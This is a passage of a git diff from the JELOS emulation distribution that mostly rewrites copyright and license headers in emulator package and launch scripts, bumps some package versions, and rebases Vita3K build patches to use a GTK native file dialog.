PKG_NAME="mupen64plus-sa-rsp-hle" PKG_VERSION="f22dc143771f1a0784c7d62977722a68fa0bdf85" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-simplecore/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-simplecore/package.mk index a548f2a0d..3f6cbfc16 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-simplecore/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-simplecore/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-simplecore" PKG_VERSION="6867e510d03ce91e67baf54116c1447033d12066" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-ui-console/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-ui-console/package.mk index 5f563bf92..8812de652 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-ui-console/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-ui-console/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-ui-console" PKG_VERSION="1340c4bdfc9ec53d3fccda5e085930dd79eb08b3" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-glide64mk2/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-glide64mk2/package.mk index f53b39ba0..e522ef7ef 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-glide64mk2/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-glide64mk2/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-video-glide64mk2" PKG_VERSION="d900f2191575e01eb846a1009be71cbc1b413dba" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-gliden64/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-gliden64/package.mk index 19e2ae505..b42ac12bb 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-gliden64/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-gliden64/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-video-gliden64" PKG_VERSION="0fee30d010d1feda7d343654871b3dfd05ccab70" diff --git a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-rice/package.mk b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-rice/package.mk index c600d6d82..540145e6c 100644 --- a/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-rice/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/mupen64plus-sa-video-rice/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2023 Nicholas Ricciuti (rishooty@gmail.com) -# Copyright (C) 2023 Fewtarius (fewtarius@jelos.org) +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa-video-rice" PKG_VERSION="470865c6c64bdb44645faa88eae59cd87ce561b6" diff --git a/packages/emulators/standalone/mupen64plus-sa/package.mk b/packages/emulators/standalone/mupen64plus-sa/package.mk index cde54fdb9..09c9804c9 100644 --- a/packages/emulators/standalone/mupen64plus-sa/package.mk +++ b/packages/emulators/standalone/mupen64plus-sa/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2009-2016 Stephan Raue (stephan@openelec.tv) # Copyright (C) 2019-present Team LibreELEC (https://libreelec.tv) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="mupen64plus-sa" PKG_VERSION="f8adbe08805d9fe9171cb2e3078f383631d1331d" diff --git a/packages/emulators/standalone/nanoboyadvance-sa/package.mk b/packages/emulators/standalone/nanoboyadvance-sa/package.mk index 3c50cab1e..0a669ee28 100644 --- a/packages/emulators/standalone/nanoboyadvance-sa/package.mk +++ b/packages/emulators/standalone/nanoboyadvance-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="nanoboyadvance-sa" PKG_VERSION="3bb6f478f977dbfd3106508536e5fbce90d1898b" diff --git a/packages/emulators/standalone/nanoboyadvance-sa/scripts/start_nanoboyadvance.sh b/packages/emulators/standalone/nanoboyadvance-sa/scripts/start_nanoboyadvance.sh index baf04f8c5..44f1b2088 100644 --- a/packages/emulators/standalone/nanoboyadvance-sa/scripts/start_nanoboyadvance.sh +++ b/packages/emulators/standalone/nanoboyadvance-sa/scripts/start_nanoboyadvance.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 NanoBoyAdvance" diff --git a/packages/emulators/standalone/openbor/package.mk b/packages/emulators/standalone/openbor/package.mk index 8bcbfef98..c8f48da29 100644 --- a/packages/emulators/standalone/openbor/package.mk +++ b/packages/emulators/standalone/openbor/package.mk @@ -1,7 +1,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="openbor" PKG_VERSION="7f6f17507078848be625e6d1c1b4f41823151387" diff --git a/packages/emulators/standalone/openbor/sources/start_OpenBOR.sh b/packages/emulators/standalone/openbor/sources/start_OpenBOR.sh index 532380f12..c10fcd12e 100755 --- a/packages/emulators/standalone/openbor/sources/start_OpenBOR.sh +++ b/packages/emulators/standalone/openbor/sources/start_OpenBOR.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # OpenBOR only works with Pak files, if you have an extracted game you will need to create a pak first. diff --git a/packages/emulators/standalone/pcsx2-sa/package.mk b/packages/emulators/standalone/pcsx2-sa/package.mk index d205647e5..411bde5e7 100644 --- a/packages/emulators/standalone/pcsx2-sa/package.mk +++ b/packages/emulators/standalone/pcsx2-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="pcsx2-sa" PKG_VERSION="v1.7.4709" diff --git a/packages/emulators/standalone/pcsx2-sa/sources/start_pcsx2.sh b/packages/emulators/standalone/pcsx2-sa/sources/start_pcsx2.sh index f616aa816..97685b460 100755 --- a/packages/emulators/standalone/pcsx2-sa/sources/start_pcsx2.sh +++ b/packages/emulators/standalone/pcsx2-sa/sources/start_pcsx2.sh @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/pico-8/package.mk b/packages/emulators/standalone/pico-8/package.mk index 0eed0ee22..31d68f5cd 100644 --- a/packages/emulators/standalone/pico-8/package.mk +++ b/packages/emulators/standalone/pico-8/package.mk @@ -1,5 +1,5 @@ -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2022-present Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="pico-8" PKG_VERSION="95cb4d4f28e1743c6a7f3c0266049f68b2134b60" diff --git a/packages/emulators/standalone/pico-8/sources/autostart/common/010-pico8 b/packages/emulators/standalone/pico-8/sources/autostart/common/010-pico8 index 97a21e677..90a0fc79e 100755 --- a/packages/emulators/standalone/pico-8/sources/autostart/common/010-pico8 +++ b/packages/emulators/standalone/pico-8/sources/autostart/common/010-pico8 @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PICO_DIR="/storage/roms/pico-8" if [ ! -d "${PICO_DIR}" ] diff --git a/packages/emulators/standalone/pico-8/sources/start_pico8.sh b/packages/emulators/standalone/pico-8/sources/start_pico8.sh index f6f49a3e0..f9c73bdef 100644 --- a/packages/emulators/standalone/pico-8/sources/start_pico8.sh +++ b/packages/emulators/standalone/pico-8/sources/start_pico8.sh @@ -1,6 +1,6 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Source predefined functions and variables . /etc/profile diff --git a/packages/emulators/standalone/ppsspp-sa/package.mk b/packages/emulators/standalone/ppsspp-sa/package.mk index cf84feec1..91e47326e 100644 --- a/packages/emulators/standalone/ppsspp-sa/package.mk +++ b/packages/emulators/standalone/ppsspp-sa/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2022-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="ppsspp-sa" PKG_REV="1" diff --git a/packages/emulators/standalone/ppsspp-sa/scripts/start_ppsspp.sh b/packages/emulators/standalone/ppsspp-sa/scripts/start_ppsspp.sh index 2a989b1a5..d8c7b56b8 100755 --- a/packages/emulators/standalone/ppsspp-sa/scripts/start_ppsspp.sh +++ b/packages/emulators/standalone/ppsspp-sa/scripts/start_ppsspp.sh @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/primehack/package.mk b/packages/emulators/standalone/primehack/package.mk index 3d7672b8b..b4cbc6454 100755 --- a/packages/emulators/standalone/primehack/package.mk +++ b/packages/emulators/standalone/primehack/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="primehack" PKG_LICENSE="GPLv2" diff --git a/packages/emulators/standalone/primehack/scripts/start_primehack.sh b/packages/emulators/standalone/primehack/scripts/start_primehack.sh index 135d8c6ba..d162f80b8 100755 --- a/packages/emulators/standalone/primehack/scripts/start_primehack.sh +++ b/packages/emulators/standalone/primehack/scripts/start_primehack.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/retroarch/autostart/003-logging b/packages/emulators/standalone/retroarch/autostart/003-logging index d11f4be5d..cfa5b7e72 100755 --- a/packages/emulators/standalone/retroarch/autostart/003-logging +++ b/packages/emulators/standalone/retroarch/autostart/003-logging @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present Fewtarius (https://github.com/fewtarius) +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) # Minimal OS variable loading for performance . /etc/profile.d/001-functions diff --git a/packages/emulators/standalone/retroarch/package.mk b/packages/emulators/standalone/retroarch/package.mk index fe8b98edb..bc791e0e5 100644 --- a/packages/emulators/standalone/retroarch/package.mk +++ b/packages/emulators/standalone/retroarch/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2021-present 351ELEC (https://github.com/351ELEC) -# Copyright (C) 2023-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="retroarch" PKG_VERSION="b53bce6877642b66739c82cee6c6af8d0a09ac1c" diff --git a/packages/emulators/standalone/rpcs3-sa/package.mk b/packages/emulators/standalone/rpcs3-sa/package.mk index f5b482e6a..cb3fa0ab9 100644 --- a/packages/emulators/standalone/rpcs3-sa/package.mk +++ b/packages/emulators/standalone/rpcs3-sa/package.mk @@ -1,9 +1,9 @@ # SPDX-License-Identifier: GPL-2.0 # Copyright (C) 2019-present Frank Hartung (supervisedthinking (@) gmail.com) -# Copyright (C) 2022-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="rpcs3-sa" -PKG_VERSION="7081b89e976ad7f931c926022bd93ddd9778347c" +PKG_VERSION="ed75bab7b284a9cb62b7308097108e4caef9a0b3" PKG_ARCH="x86_64" PKG_LICENSE="GPL-2.0-or-later" PKG_SITE="https://rpcs3.net" diff --git a/packages/emulators/standalone/rpcs3-sa/scripts/start_rpcs3.sh b/packages/emulators/standalone/rpcs3-sa/scripts/start_rpcs3.sh index 373182317..d9bc8d2e8 100755 --- a/packages/emulators/standalone/rpcs3-sa/scripts/start_rpcs3.sh +++ b/packages/emulators/standalone/rpcs3-sa/scripts/start_rpcs3.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/ryujinx-sa/package.mk b/packages/emulators/standalone/ryujinx-sa/package.mk index 5d6e78eb3..7b028f12b 100644 --- a/packages/emulators/standalone/ryujinx-sa/package.mk +++ b/packages/emulators/standalone/ryujinx-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="ryujinx-sa" PKG_VERSION="1.1.999" diff --git a/packages/emulators/standalone/ryujinx-sa/scripts/start_ryujinx.sh b/packages/emulators/standalone/ryujinx-sa/scripts/start_ryujinx.sh index ecc8d3e04..dfb3ef24f 100644 --- a/packages/emulators/standalone/ryujinx-sa/scripts/start_ryujinx.sh +++ b/packages/emulators/standalone/ryujinx-sa/scripts/start_ryujinx.sh @@ -1,7 +1,7 @@ #!/bin/bash # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) . /etc/profile jslisten set "-9 Ryujinx" diff --git a/packages/emulators/standalone/scummvmsa/config/games/_Scan ScummVM Games.sh b/packages/emulators/standalone/scummvmsa/config/games/_Scan ScummVM Games.sh index d69eb3968..b2977c3e7 100644 --- a/packages/emulators/standalone/scummvmsa/config/games/_Scan ScummVM Games.sh +++ b/packages/emulators/standalone/scummvmsa/config/games/_Scan ScummVM Games.sh @@ -2,7 +2,7 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/scummvmsa/package.mk b/packages/emulators/standalone/scummvmsa/package.mk index 23c3ccc6c..34e2a3078 100644 --- a/packages/emulators/standalone/scummvmsa/package.mk +++ b/packages/emulators/standalone/scummvmsa/package.mk @@ -1,6 +1,6 @@ # SPDX-License-Identifier: GPL-2.0-or-later # Copyright (C) 2019-present Shanti Gilbert (https://github.com/shantigilbert) -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="scummvmsa" PKG_VERSION="b347be081cb35889bebc191165fa88f5261932ba" diff --git a/packages/emulators/standalone/vice-sa/package.mk b/packages/emulators/standalone/vice-sa/package.mk index 9e0a88e93..0f63b4ebe 100644 --- a/packages/emulators/standalone/vice-sa/package.mk +++ b/packages/emulators/standalone/vice-sa/package.mk @@ -1,5 +1,5 @@ # SPDX-License-Identifier: GPL-2.0 -# Copyright (C) 2020-present Fewtarius +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) PKG_NAME="vice-sa" PKG_VERSION="3.7.1" diff --git a/packages/emulators/standalone/vice-sa/sources/start_vice.sh b/packages/emulators/standalone/vice-sa/sources/start_vice.sh index 41fc1f6b6..0d15745ec 100644 --- a/packages/emulators/standalone/vice-sa/sources/start_vice.sh +++ b/packages/emulators/standalone/vice-sa/sources/start_vice.sh @@ -1,6 +1,6 @@ #!/bin/sh -# SPDX-License-Identifier: Apache-2.0 -# Copyright (C) 2021-present - Fewtarius +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2023 JELOS (https://github.com/JustEnoughLinuxOS) . /etc/profile diff --git a/packages/emulators/standalone/vita3k-sa/package.mk b/packages/emulators/standalone/vita3k-sa/package.mk index 4e2407ea3..2b6c790bf 100644 --- a/packages/emulators/standalone/vita3k-sa/package.mk +++ b/packages/emulators/standalone/vita3k-sa/package.mk @@ -1,8 +1,8 @@ # SPDX-License-Identifier: GPL-2.0-or-later -# Copyright (C) 2023-present BrooksyTech (https://github.com/brooksytech) +# Copyright (C) 2022-present - The JELOS Project (https://github.com/JustEnoughLinuxOS) PKG_NAME="vita3k-sa" -PKG_VERSION="44d8c5da9cc6bed0b670099f4d131296ff8acf25" +PKG_VERSION="564417b3b6a31296a2a09912c249a0145376e3c8" PKG_LICENSE="GPLv2" PKG_SITE="https://github.com/Vita3K/Vita3K" PKG_URL="${PKG_SITE}.git" diff --git a/packages/emulators/standalone/vita3k-sa/patches/002-fix-curr_renderpass_info.patch b/packages/emulators/standalone/vita3k-sa/patches/002-fix-curr_renderpass_info.patch index afff0c2d8..742fd1338 100644 --- a/packages/emulators/standalone/vita3k-sa/patches/002-fix-curr_renderpass_info.patch +++ b/packages/emulators/standalone/vita3k-sa/patches/002-fix-curr_renderpass_info.patch @@ -2,7 +2,7 @@ diff --git a/vita3k/renderer/src/vulkan/context.cpp b/vita3k/renderer/src/vulkan index cbe8ff0acb..2d8d618e7d 100644 --- a/vita3k/renderer/src/vulkan/context.cpp +++ b/vita3k/renderer/src/vulkan/context.cpp -@@ -242,21 +242,21 @@ void VKContext::start_render_pass(bool create_descriptor_set) { +@@ -247,21 +247,21 @@ void VKContext::start_render_pass(bool create_descriptor_set) { if (!is_recording) start_recording(); @@ -12,7 +12,7 @@ index cbe8ff0acb..2d8d618e7d 100644 .framebuffer = current_framebuffer }; - if (render_target->has_macroblock_sync) { + if (render_target->has_macroblock_sync && !ignore_macroblock) { // set the render area to the correct macroblock - curr_renderpass_info.renderArea = { + curr_renderpass_info.renderArea = vk::Rect2D{ diff --git a/packages/emulators/standalone/vita3k-sa/patches/003-drop-xdg-desktop-portals.patch b/packages/emulators/standalone/vita3k-sa/patches/003-drop-xdg-desktop-portals.patch index 22d77ca59..a0effdc0d 100644 --- a/packages/emulators/standalone/vita3k-sa/patches/003-drop-xdg-desktop-portals.patch +++ b/packages/emulators/standalone/vita3k-sa/patches/003-drop-xdg-desktop-portals.patch @@ -19,34 +19,20 @@ diff --git a/external/CMakeLists.txt b/external/CMakeLists.txt index d4dcfc94..4cb3e1ee 100644 --- a/external/CMakeLists.txt +++ b/external/CMakeLists.txt -@@ -369,11 +369,33 @@ target_compile_definitions(tracy PUBLIC $<$:TRACY_E +@@ -344,11 +344,20 @@ target_compile_definitions(tracy PUBLIC $<$:TRACY_E + # # target_compile_definitions(tracy PUBLIC TRACY_ENABLE) - # Use XDG desktop portals on Linux +-# Use XDG desktop portals on Linux -set(NFD_PORTAL ON) -+#set(NFD_PORTAL ON) - - # nativefiledialog-extended --add_subdirectory(nativefiledialog-extended) -+#add_subdirectory(nativefiledialog-extended) - - # Create alias to prevent the need of multiple changes in case the target name changes --add_library(NFDe::NFDe ALIAS nfd) --set_property(TARGET nfd PROPERTY FOLDER externals) -+#add_library(NFDe::NFDe ALIAS nfd) -+#set_property(TARGET nfd PROPERTY FOLDER externals) -+ ++# Create alias to prevent the need of multiple changes in case the target name changes +# Batocera - bring back nativefiledialog -+if(WIN32) -+ add_library(nativefiledialog STATIC nativefiledialog-cmake/src/nfd_win.cpp nativefiledialog-cmake/src/nfd_common.c) -+ target_include_directories(nativefiledialog PUBLIC "${CMAKE_CURRENT_SOURCE_DIR}/nativefiledialog-cmake/src/include") -+elseif(APPLE) -+ add_library(nativefiledialog STATIC nativefiledialog-cmake/src/nfd_cocoa.m nativefiledialog-cmake/src/nfd_common.c) -+ target_include_directories(nativefiledialog PUBLIC "${CMAKE_CURRENT_SOURCE_DIR}/nativefiledialog-cmake/src/include") -+elseif(UNIX) ++if(UNIX) + find_package(PkgConfig REQUIRED) + pkg_check_modules(GTK3 REQUIRED gtk+-3.0) -+ + +-# nativefiledialog-extended +-add_subdirectory(nativefiledialog-extended) + include_directories(${GTK3_INCLUDE_DIRS}) + link_directories(${GTK3_LIBRARY_DIRS}) + @@ -57,7 +43,9 @@ index d4dcfc94..4cb3e1ee 100644 + target_link_libraries(nativefiledialog ${GTK3_LIBRARIES}) +endif() +set_property(TARGET nativefiledialog PROPERTY FOLDER externals) -\ No newline at end of file + +-# Create alias to prevent the need of multiple changes in case the target name changes +-add_library(NFDe::NFDe ALIAS nfd) diff --git a/vita3k/CMakeLists.txt b/vita3k/CMakeLists.txt index e1b27dfd..25d8f88b 100644 --- a/vita3k/CMakeLists.txt @@ -95,27 +83,22 @@ index ef7de553..811ee661 100644 target_include_directories(gui PUBLIC include ${CMAKE_SOURCE_DIR}/vita3k) target_link_libraries(gui PUBLIC app compat config dialog emuenv https ime imgui glutil lang regmgr np) --target_link_libraries(gui PRIVATE audio ctrl kernel miniz psvpfsparser pugixml::pugixml stb renderer packages sdl2 vkutil host::dialog) -+target_link_libraries(gui PRIVATE audio ctrl kernel miniz psvpfsparser pugixml::pugixml stb renderer packages sdl2 vkutil nativefiledialog) +-target_link_libraries(gui PRIVATE audio ctrl kernel miniz psvpfsparser pugixml::pugixml stb renderer packages sdl2 touch vkutil host::dialog) ++target_link_libraries(gui PRIVATE audio ctrl kernel miniz psvpfsparser pugixml::pugixml stb renderer packages sdl2 touch vkutil nativefiledialog) target_link_libraries(gui PUBLIC tracy) diff --git a/vita3k/gui/src/archive_install_dialog.cpp b/vita3k/gui/src/archive_install_dialog.cpp index 67832991..5d724637 100644 --- a/vita3k/gui/src/archive_install_dialog.cpp +++ b/vita3k/gui/src/archive_install_dialog.cpp -@@ -19,11 +19,12 @@ +@@ -19,7 +19,7 @@ #include "private.h" #include -#include ++#include #include #include - -+#include -+ - #include - - namespace gui { @@ -32,7 +33,7 @@ static bool delete_archive_file; static std::string state, type, title; static std::map> contents_archives; @@ -196,10 +179,10 @@ index 1b7208e6..f29150f7 100644 static void get_firmware_version(EmuEnvState &emuenv) { fs::ifstream versionFile(emuenv.pref_path + L"/PUP_DEC/PUP/version.txt"); -@@ -50,7 +50,7 @@ void draw_firmware_install_dialog(GuiState &gui, EmuEnvState &emuenv) { - auto firmware_installation = lang["firmware_installation"].c_str(); - auto common = emuenv.common_dialog.lang.common; +@@ -46,7 +46,7 @@ static void get_firmware_version(EmuEnvState &emuenv) { + } + void draw_firmware_install_dialog(GuiState &gui, EmuEnvState &emuenv) { - host::dialog::filesystem::Result result = host::dialog::filesystem::Result::CANCEL; + nfdresult_t result = NFD_CANCEL; @@ -283,7 +266,7 @@ diff --git a/vita3k/gui/src/license_install_dialog.cpp b/vita3k/gui/src/license_ index beabedb8..7eb910a5 100644 --- a/vita3k/gui/src/license_install_dialog.cpp +++ b/vita3k/gui/src/license_install_dialog.cpp -@@ -17,15 +17,16 @@ +@@ -17,15 +17,15 @@ #include "private.h" @@ -291,47 +274,46 @@ index beabedb8..7eb910a5 100644 #include #include #include - +#include -+ + namespace gui { static std::string state, title, zRIF; --std::filesystem::path work_path = ""; -+nfdchar_t *work_path; - static bool delete_work_file; +-std::filesystem::path license_path = ""; ++nfdchar_t *license_path; + static bool delete_license_file; void draw_license_install_dialog(GuiState &gui, EmuEnvState &emuenv) { -@@ -66,10 +67,10 @@ void draw_license_install_dialog(GuiState &gui, EmuEnvState &emuenv) { +@@ -67,10 +67,10 @@ void draw_license_install_dialog(GuiState &gui, EmuEnvState &emuenv) { if (ImGui::Button(common["cancel"].c_str(), BUTTON_SIZE)) gui.file_menu.license_install_dialog = false; - } else if (state == "work") { + } else if (state == "license") { - host::dialog::filesystem::Result result = host::dialog::filesystem::Result::CANCEL; -- result = host::dialog::filesystem::open_file(work_path, { { "PlayStation Vita software license file", { "bin", "rif" } } }); +- result = host::dialog::filesystem::open_file(license_path, { { "PlayStation Vita software license file", { "bin", "rif" } } }); - if (result == host::dialog::filesystem::Result::SUCCESS) { -- if (copy_license(emuenv, fs::path(work_path.wstring()))) +- if (copy_license(emuenv, fs::path(license_path.wstring()))) + nfdresult_t result = NFD_CANCEL; -+ result = NFD_OpenDialog("bin,rif", nullptr, &work_path); ++ result = NFD_OpenDialog("bin,rif", nullptr, &license_path); + if (result == NFD_OKAY) { -+ if (copy_license(emuenv, work_path)) ++ if (copy_license(emuenv, license_path)) state = "success"; else state = "fail"; -@@ -106,12 +106,12 @@ void draw_license_install_dialog(GuiState &gui, EmuEnvState &emuenv) { +@@ -105,12 +105,12 @@ void draw_license_install_dialog(GuiState &gui, EmuEnvState &emuenv) { ImGui::Spacing(); ImGui::Separator(); ImGui::Spacing(); -- if (work_path != "") -+ if (work_path) - ImGui::Checkbox(lang["delete_bin_rif"].c_str(), &delete_work_file); +- if (license_path != "") ++ if (license_path) + ImGui::Checkbox(license["delete_bin_rif"].c_str(), &delete_license_file); ImGui::SetCursorPos(ImVec2(POS_BUTTON, ImGui::GetWindowSize().y - BUTTON_SIZE.y - (20.f * SCALE.y))); if (ImGui::Button(common["ok"].c_str(), BUTTON_SIZE)) { - if (delete_work_file) { -- fs::remove(fs::path(work_path.wstring())); -+ fs::remove(fs::path(string_utils::utf_to_wide(std::string(work_path)))); - delete_work_file = false; + if (delete_license_file) { +- fs::remove(fs::path(license_path.wstring())); ++ fs::remove(fs::path(string_utils::utf_to_wide(std::string(license_path)))); + delete_license_file = false; } - work_path = nullptr; + license_path = nullptr; diff --git a/vita3k/gui/src/pkg_install_dialog.cpp b/vita3k/gui/src/pkg_install_dialog.cpp index 75c11214..46fcf6f8 100644 --- a/vita3k/gui/src/pkg_install_dialog.cpp @@ -344,22 +326,22 @@ index 75c11214..46fcf6f8 100644 #include #include #include -@@ -27,18 +26,19 @@ +@@ -25,19 +25,18 @@ + #include #include #include - +- +#include -+ #include namespace gui { -static std::filesystem::path pkg_path = ""; --static std::filesystem::path work_path = ""; -+static nfdchar_t *pkg_path, *work_path; +-static std::filesystem::path license_path = ""; ++static nfdchar_t *pkg_path, *license_path; static std::string state, title, zRIF; static bool draw_file_dialog = true; - static bool delete_pkg_file, delete_work_file; + static bool delete_pkg_file, delete_license_file; void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { - host::dialog::filesystem::Result result = host::dialog::filesystem::Result::CANCEL; @@ -387,16 +369,16 @@ index 75c11214..46fcf6f8 100644 gui.file_menu.pkg_install_dialog = false; draw_file_dialog = true; } -@@ -98,9 +98,9 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState &emuenv) { +@@ -97,9 +96,9 @@ void draw_pkg_install_dialog(GuiState &gui, EmuEnvState 